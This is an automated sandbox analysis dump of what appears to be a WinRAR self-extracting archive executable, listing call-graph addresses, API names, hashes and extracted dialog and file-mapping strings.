27482->27642 27484 7ff7bb23fb5e 27484->27482 27526->27470 27644 7ff7bb232c74 27643->27644 27647 7ff7bb232c88 27643->27647 27644->27647 28279 7ff7bb232d80 108 API calls _invalid_parameter_noinfo_noreturn 27644->28279 27645 7ff7bb231fa0 31 API calls 27649 7ff7bb232ca1 27645->27649 27647->27645 27650 7ff7bb232d64 27649->27650 28257 7ff7bb233090 27649->28257 27652 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27650->27652 27651 7ff7bb232d08 27653 7ff7bb233090 31 API calls 27651->27653 27654 7ff7bb232d7c 27652->27654 27655 7ff7bb232d14 27653->27655 27656 7ff7bb231fa0 31 API calls 27655->27656 27657 7ff7bb232d20 27656->27657 28265 7ff7bb24878c 27657->28265 27663->27350 27664->27359 27665 7ff7bb250994 83 API calls _handle_error 27665->27353 27667 7ff7bb244d32 __scrt_get_show_window_mode 27666->27667 27676 7ff7bb244bac 27667->27676 27669 7ff7bb244d54 27670 7ff7bb244d90 27669->27670 27672 7ff7bb244dae 27669->27672 27671 7ff7bb262320 _handle_error 8 API calls 27670->27671 27673 7ff7bb232b32 27671->27673 27674 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27672->27674 27673->27334 27673->27403 27675 7ff7bb244db3 27674->27675 27677 7ff7bb244c27 27676->27677 27679 7ff7bb244c2f BuildCatchObjectHelperInternal 27676->27679 27678 7ff7bb231fa0 31 API calls 27677->27678 27678->27679 27679->27669 27680->27405 27681->27421 27682->27420 27684 7ff7bb23339a 27683->27684 27685 7ff7bb233396 27683->27685 27689 7ff7bb233294 27684->27689 27685->27446 27685->27447 27688 7ff7bb242aa0 101 API calls 27688->27685 27690 7ff7bb2332bb 27689->27690 27692 7ff7bb2332f6 27689->27692 27691 7ff7bb2369f8 141 API calls 27690->27691 27695 7ff7bb2332db 27691->27695 27697 7ff7bb236e74 27692->27697 27695->27688 27701 7ff7bb236e95 27697->27701 27698 7ff7bb2369f8 141 API calls 27698->27701 27699 7ff7bb23331d 27699->27695 27702 7ff7bb233904 27699->27702 27701->27698 27701->27699 27729 7ff7bb24e808 27701->27729 27737 7ff7bb236a7c 27702->27737 27704 7ff7bb23396a 27708 7ff7bb233989 27704->27708 27709 7ff7bb23399a 27704->27709 27706 7ff7bb233a8a 27710 7ff7bb262320 _handle_error 8 API calls 27706->27710 27770 7ff7bb250d54 33 API calls 27708->27770 27711 7ff7bb2339ec 27709->27711 27712 7ff7bb2339a3 27709->27712 27715 7ff7bb233a9e 27710->27715 27772 7ff7bb2326b4 33 API calls BuildCatchObjectHelperInternal 27711->27772 27771 7ff7bb250c80 33 API calls 27712->27771 27713 7ff7bb233ab3 27716 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27713->27716 27715->27695 27718 7ff7bb233ab8 27716->27718 27721 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27718->27721 27719 7ff7bb2339b0 27722 7ff7bb231fa0 31 API calls 27719->27722 27727 7ff7bb2339c0 BuildCatchObjectHelperInternal 27719->27727 27726 7ff7bb233abe 27721->27726 27722->27727 27723 7ff7bb231fa0 31 API calls 27728 7ff7bb23394f 27723->27728 27724 7ff7bb233a13 27773 7ff7bb250ae8 34 API calls _invalid_parameter_noinfo_noreturn 27724->27773 27727->27723 27728->27706 27728->27713 27728->27718 27730 7ff7bb24e811 27729->27730 27731 7ff7bb24e82b 27730->27731 27735 7ff7bb23b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27730->27735 27733 7ff7bb24e845 SetThreadExecutionState 27731->27733 27736 7ff7bb23b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27731->27736 27735->27731 27736->27733 27738 7ff7bb236a96 _snwprintf 27737->27738 27739 7ff7bb236ae4 27738->27739 27740 7ff7bb236ac4 27738->27740 27742 7ff7bb236d4d 27739->27742 27745 7ff7bb236b0f 27739->27745 27812 7ff7bb2328a4 82 API calls 2 library calls 27740->27812 27841 7ff7bb2328a4 82 API calls 2 library calls 27742->27841 27744 7ff7bb236ad0 27746 7ff7bb262320 _handle_error 8 API calls 27744->27746 27745->27744 27774 7ff7bb251f94 27745->27774 27747 7ff7bb23394b 27746->27747 27747->27704 27747->27728 27769 7ff7bb232794 33 API calls __std_swap_ranges_trivially_swappable 27747->27769 27750 7ff7bb236b85 27753 7ff7bb236c2a 27750->27753 27768 7ff7bb236b7b 27750->27768 27818 7ff7bb248968 109 API calls 27750->27818 27751 7ff7bb236b6e 27813 7ff7bb2328a4 82 API calls 2 library calls 27751->27813 27752 7ff7bb236b80 27752->27750 27814 7ff7bb2340b0 27752->27814 27783 7ff7bb244760 27753->27783 27759 7ff7bb236c52 27760 7ff7bb236cc7 27759->27760 27761 7ff7bb236cd1 27759->27761 27787 7ff7bb241794 27760->27787 27819 7ff7bb251f20 27761->27819 27764 7ff7bb236ccf 27839 7ff7bb244700 8 API calls _handle_error 27764->27839 27766 7ff7bb236cfd 27766->27768 27840 7ff7bb23433c 82 API calls 2 library calls 27766->27840 27802 7ff7bb251870 27768->27802 27769->27704 27770->27728 27771->27719 27772->27724 27773->27728 27775 7ff7bb252056 std::bad_alloc::bad_alloc 27774->27775 27778 7ff7bb251fc5 std::bad_alloc::bad_alloc 27774->27778 27777 7ff7bb264078 Concurrency::cancel_current_task 2 API calls 27775->27777 27776 7ff7bb236b59 27776->27750 27776->27751 27776->27752 27777->27778 27778->27776 27779 7ff7bb264078 Concurrency::cancel_current_task 2 API calls 27778->27779 27780 7ff7bb25200f std::bad_alloc::bad_alloc 27778->27780 27779->27780 27780->27776 27781 7ff7bb264078 Concurrency::cancel_current_task 2 API calls 27780->27781 27782 7ff7bb2520a9 27781->27782 27784 7ff7bb244780 27783->27784 27786 7ff7bb24478a 27783->27786 27785 7ff7bb2621d0 33 API calls 27784->27785 27785->27786 27786->27759 27788 7ff7bb2417be __scrt_get_show_window_mode 27787->27788 27842 7ff7bb248a48 27788->27842 27790 7ff7bb2417f2 27792 7ff7bb241830 27790->27792 27794 7ff7bb248a48 151 API calls 27790->27794 27852 7ff7bb248c4c 27790->27852 27791 7ff7bb241856 27791->27764 27792->27791 27795 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27792->27795 27794->27790 27803 7ff7bb25188e 27802->27803 27805 7ff7bb2518a1 27803->27805 27858 7ff7bb24e948 27803->27858 27807 7ff7bb2518d8 27805->27807 27865 7ff7bb26236c 27805->27865 27811 7ff7bb251a37 27807->27811 27869 7ff7bb24a984 31 API calls _invalid_parameter_noinfo_noreturn 27807->27869 27808 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27809 7ff7bb251ad0 27808->27809 27811->27808 27812->27744 27813->27768 27815 7ff7bb2340dd 27814->27815 27816 7ff7bb2340d7 __scrt_get_show_window_mode 27814->27816 27815->27816 27870 7ff7bb234120 33 API calls 2 library calls 27815->27870 27816->27750 27818->27753 27820 7ff7bb251f29 27819->27820 27821 7ff7bb251f5d 27820->27821 27822 7ff7bb251f55 27820->27822 27824 7ff7bb251f49 27820->27824 27821->27764 27892 7ff7bb253964 156 API calls 27822->27892 27871 7ff7bb2520ac 27824->27871 27826 7ff7bb254733 BuildCatchObjectHelperInternal 27826->27826 27827 7ff7bb248a48 151 API calls 27826->27827 27828 7ff7bb254ad7 27826->27828 27875 7ff7bb24e9dc 27826->27875 27827->27826 27839->27766 27840->27768 27841->27744 27845 7ff7bb248bcd 27842->27845 27847 7ff7bb248a91 BuildCatchObjectHelperInternal 27842->27847 27843 7ff7bb248c1a 27844 7ff7bb24e808 SetThreadExecutionState RtlPcToFileHeader RaiseException 27843->27844 27849 7ff7bb248c1f 27844->27849 27845->27843 27846 7ff7bb23a174 8 API calls 27845->27846 27846->27843 27847->27845 27848 7ff7bb25612c 146 API calls 27847->27848 27847->27849 27850 7ff7bb244888 108 API calls 27847->27850 27851 7ff7bb2428d0 104 API calls 27847->27851 27848->27847 27849->27790 27850->27847 27851->27847 27859 7ff7bb24ecd8 103 API calls 27858->27859 27860 7ff7bb24e95f ReleaseSemaphore 27859->27860 27861 7ff7bb24e9a3 DeleteCriticalSection CloseHandle CloseHandle 27860->27861 27862 7ff7bb24e984 27860->27862 27863 7ff7bb24ea5c 101 API calls 27862->27863 27864 7ff7bb24e98e FindCloseChangeNotification 27863->27864 27864->27861 27864->27862 27867 7ff7bb26239f 27865->27867 27866 7ff7bb2623c8 27866->27807 27867->27866 27868 7ff7bb251870 108 API calls 27867->27868 27868->27867 27869->27811 27873 7ff7bb2520c8 __scrt_get_show_window_mode 27871->27873 27872 7ff7bb2521ba 27872->27826 27873->27872 27874 7ff7bb23b75c 82 API calls 27873->27874 27874->27873 27892->27821 27902 7ff7bb248882 27901->27902 27903 7ff7bb248892 27901->27903 27908 7ff7bb2423f0 27902->27908 27903->27452 27906 7ff7bb262320 _handle_error 8 API calls 27905->27906 27907 7ff7bb23f7dc 27906->27907 27907->27353 27907->27665 27909 7ff7bb24240f 27908->27909 27912 7ff7bb242aa0 101 API calls 27909->27912 27910 7ff7bb242428 27913 7ff7bb242bb0 101 API calls 27910->27913 27911 7ff7bb242438 27911->27903 27912->27910 27913->27911 27915 7ff7bb235e67 27914->27915 27916 7ff7bb235ea5 27915->27916 27921 7ff7bb235eb7 27915->27921 27945 7ff7bb236084 27915->27945 28009 7ff7bb2328a4 82 API calls 2 library calls 27916->28009 27919 7ff7bb236134 28016 7ff7bb236fcc 82 API calls 27919->28016 27921->27919 27923 7ff7bb235f44 27921->27923 28010 7ff7bb236f38 33 API calls BuildCatchObjectHelperInternal 27921->28010 27922 7ff7bb2369af 27925 7ff7bb262320 _handle_error 8 API calls 27922->27925 28011 7ff7bb236d88 82 API calls 27923->28011 27927 7ff7bb2369c3 27925->27927 27926 7ff7bb2369e4 27929 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27926->27929 27927->27463 27933 7ff7bb2369e9 27929->27933 27930 7ff7bb236973 27993 7ff7bb235eb2 27930->27993 28029 7ff7bb23466c 82 API calls 27930->28029 27936 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27933->27936 27934 7ff7bb23612e 27934->27919 27934->27930 27938 7ff7bb2485f0 104 API calls 27934->27938 27935 7ff7bb236034 27940 7ff7bb26236c 108 API calls 27935->27940 27935->27945 27937 7ff7bb2369ef 27936->27937 27941 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27937->27941 27939 7ff7bb2361a4 27938->27939 27939->27919 27949 7ff7bb2361ac 27939->27949 27942 7ff7bb23606e 27940->27942 27943 7ff7bb2369f5 27941->27943 27944 7ff7bb26236c 108 API calls 27942->27944 27944->27945 27999 7ff7bb2485f0 27945->27999 27946 7ff7bb236097 28015 7ff7bb23433c 82 API calls 2 library calls 27946->28015 27951 7ff7bb23623f 27949->27951 28017 7ff7bb23466c 82 API calls 27949->28017 27950 7ff7bb235f5d 27950->27935 27950->27946 28012 7ff7bb23433c 82 API calls 2 library calls 27950->28012 28013 7ff7bb236d88 82 API calls 27950->28013 28014 7ff7bb23a1a0 109 API calls _handle_error 27950->28014 27951->27930 27958 7ff7bb236266 27951->27958 27954 7ff7bb2360a1 27955 7ff7bb26236c 108 API calls 27954->27955 27954->27993 27956 7ff7bb2360f4 27955->27956 27957 7ff7bb26236c 108 API calls 27956->27957 27957->27993 27993->27922 27993->27926 27993->27937 27997->27463 28000 7ff7bb248614 27999->28000 28002 7ff7bb24869a 27999->28002 28001 7ff7bb24867c 28000->28001 28003 7ff7bb2340b0 33 API calls 28000->28003 28001->27934 28002->28001 28004 7ff7bb2340b0 33 API calls 28002->28004 28005 7ff7bb24864d 28003->28005 28006 7ff7bb2486b3 28004->28006 28030 7ff7bb23a174 28005->28030 28008 7ff7bb2428d0 104 API calls 28006->28008 28008->28001 28009->27993 28011->27950 28012->27950 28013->27950 28014->27950 28015->27954 28016->27993 28031 7ff7bb23a185 28030->28031 28032 7ff7bb23a19a 28031->28032 28034 7ff7bb24af18 8 API calls 2 library calls 28031->28034 28032->28001 28034->28032 28043 7ff7bb239be7 28035->28043 28036 7ff7bb239c1b 28037 7ff7bb262320 _handle_error 8 API calls 28036->28037 28038 7ff7bb239c9d 28037->28038 28038->27479 28040 7ff7bb239c83 28041 7ff7bb231fa0 31 API calls 28040->28041 28041->28036 28043->28036 28043->28040 28044 7ff7bb239cae 28043->28044 28165 7ff7bb245294 28043->28165 28185 7ff7bb24db60 28043->28185 28045 7ff7bb239cbf 28044->28045 28189 7ff7bb24da48 CompareStringW 28044->28189 28045->28040 28047 7ff7bb2320b0 33 API calls 28045->28047 28047->28040 28061 7ff7bb245f3a 28048->28061 28049 7ff7bb262320 _handle_error 8 API calls 28050 7ff7bb23fb29 28049->28050 28050->27482 28115 7ff7bb247c94 47 API calls 2 library calls 28050->28115 28052 7ff7bb23129c 33 API calls 28054 7ff7bb246129 28052->28054 28053 7ff7bb2461d4 28055 7ff7bb231fa0 31 API calls 28054->28055 28057 7ff7bb24613b BuildCatchObjectHelperInternal 28054->28057 28055->28057 28056 7ff7bb24619b 28056->28049 28057->28056 28058 7ff7bb2461c9 28057->28058 28059 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 28058->28059 28060 7ff7bb2461ce 28059->28060 28199 7ff7bb23704c 47 API calls BuildCatchObjectHelperInternal 28060->28199 28061->28052 28061->28056 28061->28060 28114->27471 28115->27484 28163->27526 28164->27526 28166 7ff7bb2452d4 28165->28166 28172 7ff7bb245312 __vcrt_InitializeCriticalSectionEx 28166->28172 28183 7ff7bb24539e __vcrt_InitializeCriticalSectionEx 28166->28183 28196 7ff7bb2513f4 CompareStringW 28166->28196 28168 7ff7bb262320 _handle_error 8 API calls 28170 7ff7bb245503 28168->28170 28170->28043 28173 7ff7bb245339 28172->28173 28174 7ff7bb245382 __vcrt_InitializeCriticalSectionEx 28172->28174 28197 7ff7bb2513f4 CompareStringW 28172->28197 28173->28168 28174->28173 28175 7ff7bb23129c 33 API calls 28174->28175 28176 7ff7bb245439 28174->28176 28174->28183 28177 7ff7bb245426 28175->28177 28178 7ff7bb24551b 28176->28178 28179 7ff7bb245489 28176->28179 28180 7ff7bb2472cc 8 API calls 28177->28180 28182 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 28178->28182 28179->28173 28179->28183 28198 7ff7bb2513f4 CompareStringW 28179->28198 28180->28176 28184 7ff7bb245520 28182->28184 28183->28173 28190 7ff7bb245524 28183->28190 28187 7ff7bb24db73 28185->28187 28186 7ff7bb24db91 28186->28043 28187->28186 28188 7ff7bb2320b0 33 API calls 28187->28188 28188->28186 28189->28045 28191 7ff7bb245550 28190->28191 28192 7ff7bb2513b8 CharUpperW 28191->28192 28194 7ff7bb2455bf 28191->28194 28195 7ff7bb2455fd 28191->28195 28192->28191 28193 7ff7bb245524 CharUpperW 28193->28194 28194->28193 28194->28195 28195->28173 28196->28172 28197->28174 28198->28183 28199->28053 28258 7ff7bb231fa0 31 API calls 28257->28258 28259 7ff7bb2330a5 28258->28259 28260 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 28259->28260 28261 7ff7bb2330fd 28260->28261 28262 7ff7bb24b825 28261->28262 28263 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 28261->28263 28262->27651 28264 7ff7bb24b846 28263->28264 28266 7ff7bb2487af 28265->28266 28268 7ff7bb2487df 28265->28268 28267 7ff7bb26236c 108 API calls 28266->28267 28270 7ff7bb2487ca 28267->28270 28271 7ff7bb26236c 108 API calls 28268->28271 28278 7ff7bb24882b 28268->28278 28273 7ff7bb26236c 108 API calls 28270->28273 28274 7ff7bb248814 28271->28274 28272 7ff7bb248845 28275 7ff7bb24461c 108 API calls 28272->28275 28273->28268 28276 7ff7bb26236c 108 API calls 28274->28276 28277 7ff7bb248851 28275->28277 28276->28278 28280 7ff7bb24461c 28278->28280 28279->27647 28281 7ff7bb244632 28280->28281 28283 7ff7bb24463a 28280->28283 28282 7ff7bb24e948 108 API calls 28281->28282 28282->28283 28283->28272 28285 7ff7bb24163e 28284->28285 28291 7ff7bb241681 28284->28291 28288 7ff7bb2431bc 51 API calls 28285->28288 28285->28291 28286 7ff7bb23e600 31 API calls 28289 7ff7bb2416de 28286->28289 28287 7ff7bb231fa0 31 API calls 28287->28291 28288->28285 28290 7ff7bb24175b 28289->28290 28293 7ff7bb24178d 28289->28293 28294 7ff7bb262320 _handle_error 8 API calls 28290->28294 28291->28287 28292 7ff7bb2416a0 28291->28292 28292->28286 28295 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 28293->28295 28296 7ff7bb23e58a 28294->28296 28297 7ff7bb241792 28295->28297 28296->27291 28296->27293 28298->26955 28299->26961 28300->26964 28301 7ff7bb2603e0 28302 7ff7bb260497 28301->28302 28303 7ff7bb26041f 28301->28303 28304 7ff7bb24aae0 48 API calls 28302->28304 28305 7ff7bb24aae0 48 API calls 28303->28305 28306 7ff7bb2604ab 28304->28306 28307 7ff7bb260433 28305->28307 28308 7ff7bb24da98 48 API calls 28306->28308 28309 7ff7bb24da98 48 API calls 28307->28309 28313 7ff7bb260442 BuildCatchObjectHelperInternal 28308->28313 28309->28313 28310 7ff7bb231fa0 31 API calls 28311 7ff7bb260541 28310->28311 28315 7ff7bb23250c SetDlgItemTextW 28311->28315 28312 7ff7bb2605cc 28318 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 28312->28318 28313->28310 28313->28312 28314 7ff7bb2605c6 28313->28314 28317 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 28314->28317 28316 7ff7bb260556 SetDlgItemTextW 28315->28316 28320 7ff7bb26056f 28316->28320 28321 7ff7bb26059c 28316->28321 28317->28312 28319 7ff7bb2605d2 28318->28319 28320->28321 28323 7ff7bb2605c1 28320->28323 28322 7ff7bb262320 _handle_error 8 API calls 28321->28322 28324 7ff7bb2605af 28322->28324 28325 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 28323->28325 28325->28314 28326 7ff7bb2611cf 28328 7ff7bb261102 28326->28328 28327 7ff7bb261900 _com_raise_error 14 API calls 28327->28328 28328->28327
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                                          • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                          • API String ID: 3303814210-2702805183
                                          • Opcode ID: c5bbe014e609139cb114cc60c171e21f4bc2997a70897e34b2ce553792c95928
                                          • Instruction ID: e3b0c6f545f533edf975ea9a4530dd3d534005248cc57ee088b733f6c9d6e879
                                          • Opcode Fuzzy Hash: c5bbe014e609139cb114cc60c171e21f4bc2997a70897e34b2ce553792c95928
                                          • Instruction Fuzzy Hash: C2D27161E0968295EA20BB2DE8942F9A361BFA7780FC04535DF8D466BDDF3CE544C720

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1466 7ff7bb260754-7ff7bb260829 call 7ff7bb24dfd0 call 7ff7bb2462dc call 7ff7bb25946c call 7ff7bb263cf0 call 7ff7bb259a14 1477 7ff7bb26082b-7ff7bb260840 1466->1477 1478 7ff7bb260860-7ff7bb260883 1466->1478 1479 7ff7bb26085b call 7ff7bb26220c 1477->1479 1480 7ff7bb260842-7ff7bb260855 1477->1480 1481 7ff7bb2608ba-7ff7bb2608dd 1478->1481 1482 7ff7bb260885-7ff7bb26089a 1478->1482 1479->1478 1480->1479 1483 7ff7bb260ddd-7ff7bb260de2 call 7ff7bb267904 1480->1483 1487 7ff7bb260914-7ff7bb260937 1481->1487 1488 7ff7bb2608df-7ff7bb2608f4 1481->1488 1485 7ff7bb26089c-7ff7bb2608af 1482->1485 1486 7ff7bb2608b5 call 7ff7bb26220c 1482->1486 1503 7ff7bb260de3-7ff7bb260e2f call 7ff7bb267904 call 7ff7bb261900 1483->1503 1485->1483 1485->1486 1486->1481 1491 7ff7bb26096e-7ff7bb26097a GetCommandLineW 1487->1491 1492 7ff7bb260939-7ff7bb26094e 1487->1492 1489 7ff7bb2608f6-7ff7bb260909 1488->1489 1490 7ff7bb26090f call 7ff7bb26220c 1488->1490 1489->1483 1489->1490 1490->1487 1499 7ff7bb260b47-7ff7bb260b5e call 7ff7bb246454 1491->1499 1500 7ff7bb260980-7ff7bb2609b7 call 7ff7bb26797c call 7ff7bb23129c call 7ff7bb25cad0 1491->1500 1496 7ff7bb260969 call 7ff7bb26220c 1492->1496 1497 7ff7bb260950-7ff7bb260963 1492->1497 1496->1491 1497->1483 1497->1496 1508 7ff7bb260b89-7ff7bb260ce4 call 7ff7bb231fa0 SetEnvironmentVariableW GetLocalTime call 7ff7bb243e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff7bb25b014 call 7ff7bb2498ac call 7ff7bb2567b4 * 2 DialogBoxParamW call 7ff7bb2568a8 * 2 1499->1508 1509 7ff7bb260b60-7ff7bb260b85 call 7ff7bb231fa0 call 7ff7bb263640 1499->1509 1524 7ff7bb2609ec-7ff7bb2609f3 1500->1524 1525 7ff7bb2609b9-7ff7bb2609cc 1500->1525 1522 7ff7bb260e34-7ff7bb260e6a 1503->1522 1572 7ff7bb260cec-7ff7bb260cf3 1508->1572 1573 7ff7bb260ce6 Sleep 1508->1573 1509->1508 1528 7ff7bb260e6c 1522->1528 1531 7ff7bb260adb-7ff7bb260b12 call 7ff7bb26797c call 7ff7bb23129c call 7ff7bb25fd0c 1524->1531 1532 7ff7bb2609f9-7ff7bb260a13 OpenFileMappingW 1524->1532 1529 7ff7bb2609ce-7ff7bb2609e1 1525->1529 1530 7ff7bb2609e7 call 7ff7bb26220c 1525->1530 1528->1528 1529->1503 1529->1530 1530->1524 1531->1499 1555 7ff7bb260b14-7ff7bb260b27 1531->1555 1536 7ff7bb260a19-7ff7bb260a39 MapViewOfFile 1532->1536 1537 7ff7bb260ad0-7ff7bb260ad9 CloseHandle 1532->1537 1536->1537 1540 7ff7bb260a3f-7ff7bb260a6f UnmapViewOfFile MapViewOfFile 1536->1540 1537->1499 1540->1537 1543 7ff7bb260a71-7ff7bb260aca call 7ff7bb25a190 call 7ff7bb25fd0c call 7ff7bb24b9b4 call 7ff7bb24bb00 call 7ff7bb24bb70 UnmapViewOfFile 1540->1543 1543->1537 1558 7ff7bb260b29-7ff7bb260b3c 1555->1558 1559 7ff7bb260b42 call 7ff7bb26220c 1555->1559 1558->1559 1562 7ff7bb260dd7-7ff7bb260ddc call 7ff7bb267904 1558->1562 1559->1499 1562->1483 1575 7ff7bb260cfa-7ff7bb260d1d call 7ff7bb24b8e0 DeleteObject 1572->1575 1576 7ff7bb260cf5 call 7ff7bb259f4c 1572->1576 1573->1572 1580 7ff7bb260d25-7ff7bb260d2c 1575->1580 1581 7ff7bb260d1f DeleteObject 1575->1581 1576->1575 1582 7ff7bb260d2e-7ff7bb260d35 1580->1582 1583 7ff7bb260d48-7ff7bb260d59 1580->1583 1581->1580 1582->1583 1584 7ff7bb260d37-7ff7bb260d43 call 7ff7bb23ba0c 1582->1584 1585 7ff7bb260d5b-7ff7bb260d67 call 7ff7bb25fe24 CloseHandle 1583->1585 1586 7ff7bb260d6d-7ff7bb260d7a 1583->1586 1584->1583 1585->1586 1589 7ff7bb260d7c-7ff7bb260d89 1586->1589 1590 7ff7bb260d9f-7ff7bb260da4 call 7ff7bb2594e4 1586->1590 1592 7ff7bb260d8b-7ff7bb260d93 1589->1592 1593 7ff7bb260d99-7ff7bb260d9b 1589->1593 1595 7ff7bb260da9-7ff7bb260dd6 call 7ff7bb262320 1590->1595 1592->1590 1596 7ff7bb260d95-7ff7bb260d97 1592->1596 1593->1590 1597 7ff7bb260d9d 1593->1597 1596->1590 1597->1590
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                          • API String ID: 1048086575-3710569615
                                          • Opcode ID: cf171760da93c4691ee509495d3afa31e70d11824e8d8503b99fa0ba8bf4b656
                                          • Instruction ID: 9d3e9d564025e8d08cf02526f36576436c012d284ab6e3105722ba92333036f2
                                          • Opcode Fuzzy Hash: cf171760da93c4691ee509495d3afa31e70d11824e8d8503b99fa0ba8bf4b656
                                          • Instruction Fuzzy Hash: 91127721E1978285EB10AB2DE8452F9A361FFAA754F804235DF9D46ABDDF3CE540C720

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                          • String ID: $%s:$CAPTION
                                          • API String ID: 1936833115-404845831
                                          • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                          • Instruction ID: 69746610df52101a9da68b1c120ef242d7dba799ce435edac7537abd4d2673b4
                                          • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                          • Instruction Fuzzy Hash: C291C832B1864186E714AF3DA8446A9A7A1FB9A784F845535EF8D47B6CCF3CE805CB10
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn
                                          • String ID: __tmp_reference_source_
